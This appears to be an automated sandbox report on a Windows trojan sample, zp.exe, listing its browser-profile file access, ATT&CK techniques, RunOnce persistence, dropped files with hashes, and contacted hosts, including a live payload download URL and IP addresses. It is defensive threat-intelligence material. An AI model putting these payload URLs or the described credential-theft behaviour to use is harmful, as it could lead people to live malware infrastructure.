          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\257d7e53-7c95-4bfc-a725-90881a0e607eJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldbJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: zp.exe PID: 7940, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          11
          Registry Run Keys / Startup Folder
          11
          Process Injection
          11
          Masquerading
          1
          OS Credential Dumping
          331
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/Job1
          DLL Side-Loading
          11
          Registry Run Keys / Startup Folder
          14
          Virtualization/Sandbox Evasion
          1
          Credentials in Registry
          14
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth1
          Non-Standard Port
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          11
          Process Injection
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin Shares1
          Data from Local System
          Automated Exfiltration1
          Ingress Tool Transfer
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Obfuscated Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer2
          Non-Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets3
          File and Directory Discovery
          SSHKeyloggingData Transfer Size Limits12
          Application Layer Protocol
          Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion
          Cached Domain Credentials26
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          zp.exe8%ReversingLabs
          zp.exe14%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\subfolder1\Unchurch.exe8%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://http:///etc/puk.keyMachineGuid0%Avira URL Cloudsafe
          https://discord.com0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/rh/rh.binApoasNatalramsyadvocates.com/rh/rh.bin0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/rh/rh.bineQ%d0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
          https://discord.com0%VirustotalBrowse
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
          http://bluemaxxlaser.com/rh/rh.bin0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/rh/rh.bine0%Avira URL Cloudsafe
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/rh/rh.binrU0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/0%Avira URL Cloudsafe
          http://bluemaxxlaser.com/rh/rh.bin.0%Avira URL Cloudsafe
          http://jimmac.musichall.czif0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          bluemaxxlaser.com
          203.175.174.69
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://bluemaxxlaser.com/rh/rh.binfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://bluemaxxlaser.com/rh/rh.bineQ%dzp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://discord.comcertreq.exe, 00000005.00000003.6633428832.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://http:///etc/puk.keyMachineGuidcertreq.exe, 00000005.00000003.6495131172.00000215CFD8F000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6502645292.00000215CFD86000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdzp.exe, 00000002.00000001.5590107650.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://nsis.sf.net/NSIS_Errorzp.exe, Unchurch.exe.2.drfalse
              high
              http://bluemaxxlaser.com/rh/rh.binApoasNatalramsyadvocates.com/rh/rh.binzp.exe, 00000002.00000002.6359786003.0000000032E90000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://bluemaxxlaser.com/rh/rh.binezp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://discordapp.comcertreq.exe, 00000005.00000003.6633428832.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdzp.exe, 00000002.00000001.5590107650.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://bluemaxxlaser.com/rh/rh.binrUzp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://bluemaxxlaser.com/zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://bluemaxxlaser.com/rh/rh.bin.zp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://jimmac.musichall.cziftext-x-generic-template.png.0.drfalse
                • Avira URL Cloud: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorzp.exe, Unchurch.exe.2.drfalse
                  high
                  http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDzp.exe, 00000002.00000001.5590107650.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                    high
                    http://www.gopher.ftp://ftp.zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzipcertreq.exe, 00000005.00000003.6521668733.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6632256371.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6625019609.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6517161518.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6631091124.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6546018409.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6549917437.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6587995571.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6594375401.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6586715711.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6613298341.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6509817279.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6565214935.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6522814593.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6622501624.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6511122104.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6567804977.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6562592625.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6504772908.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6626224955.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6605536412.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    203.175.174.69
                    bluemaxxlaser.comSingapore
                    24482SGGS-AS-APSGGSSGfalse
                    45.66.230.155
                    unknownGermany
                    33657CMCSUSfalse
                    Joe Sandbox Version:37.1.0 Beryl
                    Analysis ID:879710
                    Start date and time:2023-06-01 12:27:07 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 14m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:zp.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@6/7@1/2
                    EGA Information:
                    • Successful, ratio: 33.3%
                    HDC Information:
                    • Successful, ratio: 85% (good quality ratio 83.6%)
                    • Quality average: 87.5%
                    • Quality standard deviation: 22.3%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 51
                    • Number of non-executed functions: 33
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, spclient.wg.spotify.com, wdcpalt.microsoft.com
                    • Execution Graph export aborted for target certreq.exe, PID 2560 because there are no executed function
                    • Execution Graph export aborted for target zp.exe, PID 7940 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    TimeTypeDescription
                    12:30:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Unchurch.exe
                    12:30:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Unchurch.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    203.175.174.69eua.ps1Get hashmaliciousGuLoaderBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    zp.ps1Get hashmaliciousUnknownBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    zk.ps1Get hashmaliciousUnknownBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    mx.ps1Get hashmaliciousUnknownBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    zpeu.exeGet hashmaliciousGuLoaderBrowse
                    • bluemaxxlaser.com/rh/rheu.bin
                    as.ps1Get hashmaliciousGuLoaderBrowse
                    • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    bluemaxxlaser.comeua.ps1Get hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    zp.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    zk.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    mx.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    zpeu.exeGet hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    as.ps1Get hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    SGGS-AS-APSGGSSGeua.ps1Get hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    zp.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    zk.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    mx.ps1Get hashmaliciousUnknownBrowse
                    • 203.175.174.69
                    zpeu.exeGet hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    as.ps1Get hashmaliciousGuLoaderBrowse
                    • 203.175.174.69
                    Fe7MaP3DNP.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.10
                    Demon.x86.elfGet hashmaliciousUnknownBrowse
                    • 103.14.247.55
                    tebjuOp0kK.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.35
                    7Hhy4dfkst.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.31
                    5HzazUnnF6.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.75
                    4M3ACl2k2v.elfGet hashmaliciousUnknownBrowse
                    • 103.14.247.47
                    wget.elfGet hashmaliciousUnknownBrowse
                    • 103.14.247.29
                    chB6z5L2GD.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.10
                    86iDRbpkXb.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.72
                    yC34ftIroi.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.68
                    http://singaporeoptometricassociation.com/Get hashmaliciousUnknownBrowse
                    • 203.175.162.79
                    PiuV0y8Fw8.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.49
                    BvZi2Dj3LS.elfGet hashmaliciousMiraiBrowse
                    • 103.14.247.26
                    q44S0kQ3wZ.exeGet hashmaliciousAgentTesla, VidarBrowse
                    • 203.175.174.68
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dllzp.ps1Get hashmaliciousUnknownBrowse
                      36819.exe.docGet hashmaliciousGuLoaderBrowse
                        E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                          E-dekont_pdf.exeGet hashmaliciousUnknownBrowse
                            od2DVGA5N3.exeGet hashmaliciousGuLoaderBrowse
                              od2DVGA5N3.exeGet hashmaliciousGuLoaderBrowse
                                Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exeGet hashmaliciousGuLoaderBrowse
                                  Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exeGet hashmaliciousGuLoaderBrowse
                                    file.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                      file.exeGet hashmaliciousGuLoaderBrowse
                                        rZiraatBankasiSwiftMesaji_pdf.exeGet hashmaliciousGuLoaderBrowse
                                          rZiraatBankasiSwiftMesaji_pdf.exeGet hashmaliciousGuLoaderBrowse
                                            E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  dekont.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                    E-dekont_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                      dekont.exeGet hashmaliciousGuLoaderBrowse
                                                        E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):454720
                                                          Entropy (8bit):7.9962689327165375
                                                          Encrypted:true
                                                          SSDEEP:12288:A29eoKlpLINc6TF7CG9ATsGOOjDwpM5s6MS:8p0K6TF+uKO1MES
                                                          MD5:54C4B2402B46F2BD8E7B39522A902825
                                                          SHA1:6FEA84AC6E3C02A986DD0551A45DB679FFB31185
                                                          SHA-256:E0BE471E4A59A411A20CC2EED655BDB7EECD1CABBADB10F026382A91656FA779
                                                          SHA-512:FBBE96C61350228D1DDC36A44A27EEAC5FC3793D7B9E86162C29FEBAD2A01B7688475A39185B81914C40698505E26C998BF15EEF7D68597EFC31FC33D82DF6F9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:.L........S.....]{DL....@.x.E.^..P...@ ......=.p'.=...(..uZh.I..Z.D..`.g.8...N8Lq6.....C 3.....<..`z..1Huv.j...&Bf..Z..5.g.S.X.W1.p.;..3H.....mp}A.I.E...V}...P.gZ.o.o..Y....wu...m.M..;..Y.........[.5t....1].Z......:..46,`...m......@.....|.*....1!..<.XYLON......0.q-.}..aE.....N.zR.3.s.:....t.....Vd.e..5&..q.i.nQ.v_y.o....{.j]....o.:....\5.....;F".h......4M...^.U.O.TG..)^..Q.....-.o...z..2>.:....PI.h|7.}..1.`b...'....d....dx}.7..\...|9$."..EH.}..QV.W..#.y.PW.U...- ..............0O.*...)^.9H.......i1.Y......a...>......B.....qk.C{.B.8w..<....c..[...Dy......................!...iSU....[t..L..|d+H ..2.X..Xd....$.mb....zS.........I.h....NHi...T.S.7V.,.._*A...lu?.n~6.R..%.v........5.cai(.O.7...ZUs.iG.$..]..*.r~-T...)..M..x.....L..b."...A..i..0........&6.CX.Pm*.W.......h.)wZS7.c.e.`V.......e..T.)M4.F......l1+.S......I..D.E..X.d.V$;.g......Q.^...U.48....<.rM..<.h..h..!/..?A..W...8.e.@..U..%[6F...@ ....c;({.Z...{z.....-.#b.1.M.R!,......^.s...
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):195216
                                                          Entropy (8bit):6.971960422491572
                                                          Encrypted:false
                                                          SSDEEP:3072:PDOFOgWbK0ErSUsHBVVkQ63SaafssNkJsdCZ3reRbZ4CsosX8iA1vkDi14qbzJRC:PDt9xUsBkQ6CaGiJzFrehOCoX8Dwi14L
                                                          MD5:51804F0D6ECD3B9DC371282708B0DBBE
                                                          SHA1:CD2372D9DABC090AB587DA3D0F0472711FF1FC67
                                                          SHA-256:531ED696C0C53FDD52EBCF316A75655F3ECDDA45D74281D21F6498AC339E3219
                                                          SHA-512:64ED0F0ACFCA4A5063653085F49DE6D642042EFFA5B03E1A4FB4486A7C1C20F73C7BF93B522CB75629B7C850B62E79926EA0CA7081697710389F70945CDDC0F4
                                                          Malicious:false
                                                          Preview:........,...................n...........1...................................J...]...........................................................................................................................................................................................................g...x...........U...j...............................................................................................................................D...........8...'.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11264
                                                          Entropy (8bit):5.757895701334371
                                                          Encrypted:false
                                                          SSDEEP:192:aVL7iZJX76BisO7+UZEw+Rl59pV8ghsVJ39dx8T:d7NsOpZsfLMJ39e
                                                          MD5:A436DB0C473A087EB61FF5C53C34BA27
                                                          SHA1:65EA67E424E75F5065132B539C8B2EDA88AA0506
                                                          SHA-256:75ED40311875312617D6711BAED0BE29FCAEE71031CA27A8D308A72B15A51E49
                                                          SHA-512:908F46A855480AF6EACB2FB64DE0E60B1E04BBB10B23992E2CF38A4CBEBDCD7D3928C4C022D7AD9F7479265A8F426B93EEF580AFEC95570E654C360D62F5E08D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: zp.ps1, Detection: malicious, Browse
                                                          • Filename: 36819.exe.doc, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: od2DVGA5N3.exe, Detection: malicious, Browse
                                                          • Filename: od2DVGA5N3.exe, Detection: malicious, Browse
                                                          • Filename: Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exe, Detection: malicious, Browse
                                                          • Filename: Ziraat_Bankasi_Swift_Mesaji_pdf_(2).exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: rZiraatBankasiSwiftMesaji_pdf.exe, Detection: malicious, Browse
                                                          • Filename: rZiraatBankasiSwiftMesaji_pdf.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: dekont.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          • Filename: dekont.exe, Detection: malicious, Browse
                                                          • Filename: E-dekont_pdf.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...z.oS...........!................$'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...o........................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..F....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):535909
                                                          Entropy (8bit):6.217350560053726
                                                          Encrypted:false
                                                          SSDEEP:12288:Og0GDb777P77oF77PfI7szHhS+K+E7BoIJIuByPe6WZV9buv3mD:GLK9IQyPc396vWD
                                                          MD5:849ACB6881494898FF4A18A4A0FBDB43
                                                          SHA1:1D7FE1693E30DEB8EC2D4F2DC04E7C083FD53AB3
                                                          SHA-256:F069F56E5597954DCE10AFF5FDAEF9D3BA60BF8EBD996793C47193ECAFBA4481
                                                          SHA-512:B7A75C27FD7AA8BB6384277EDA73479DF6B49C2C61A1CFA8D458809B787FBF46BBE72F44E9599C82CBED99FC11C53C3B59072BEBE37953366932B88AD5DD0ACF
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 8%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................................................................s.......P...............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data...............r..............@....ndata.......@...........................rsrc........P.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:ASCII text, with very long lines (53268), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):53268
                                                          Entropy (8bit):2.684317642932276
                                                          Encrypted:false
                                                          SSDEEP:768:dVxwKHzlY+1eXGEKGW4c0YzQnrAUgkrCSiQkj12qDxToZLL23FEEEc5c/4jUYifk:DTPG8POJ8xUZXIdjUJJmyvPfq
                                                          MD5:96316B84E79ECE7FEDDB9C47B2995DBB
                                                          SHA1:5ED39E6FCAE0FF2ABEE3180806F7C2B47ED2F6B4
                                                          SHA-256:7418720923F5512313D1D62E125F0359630FB385A83396C534E16EBC6A3906D5
                                                          SHA-512:7B2EAA702F4ABE6885D17AE3459FEA48C7EB7A0EB2DEE2BC1BC29A78A906A88880C52FFE6AC98AF1FA6E6D3181FFF95E13BD0340ACCAE97D9EE9BC41607E793C
                                                          Malicious:false
                                                          Preview:0000000000000000001E00B7B7B7003A00626262000000004A0000380000060000000000BFBF000909004D4D4D4D0000DCDC0000EC000000A2A2A2A2A20000B3B3003D008C8C8C000000CFCF00F3F3000000000000009F007A00B2B2000000AFAFAF00070700A6000090000900000000640000ADAD007A7A7A7A7A002900006F6F6F0000004B4B00A7005C00000085000E0E00434343000000A7000000005A000037001F002F2F2F2F2F0000FFFF0000004A4A000000656500A2009100A4A4A4005D000C0C0C00007B0000000000AD00007A7A7A004D00060606000000858500170000DF0000CC0000000000DC000000000000505000009D9D00190000888800ACACAC00BF0000000000000000C4C4001800006868000006060000000087870000000000000000191919191900000067676700004E4E00FFFFFF00ACAC00A200002525000000000013007A0000585858008000000030005000790060600000004400009100007070700000B0006D0000F500000000000000F2F2000076000000E4E4007E7E7E007E7E0082001919190000C9C9000073737373730012121200003E0000002400004E0000100000CFCFCF00000096001D1D00000000000082004D4D0000000000434343000000AA00EDEDED0000007474747474000000FEFE00E9E9E9E9E9E9000000000035353500005A00000000
                                                          Process:C:\Users\user\Desktop\zp.exe
                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
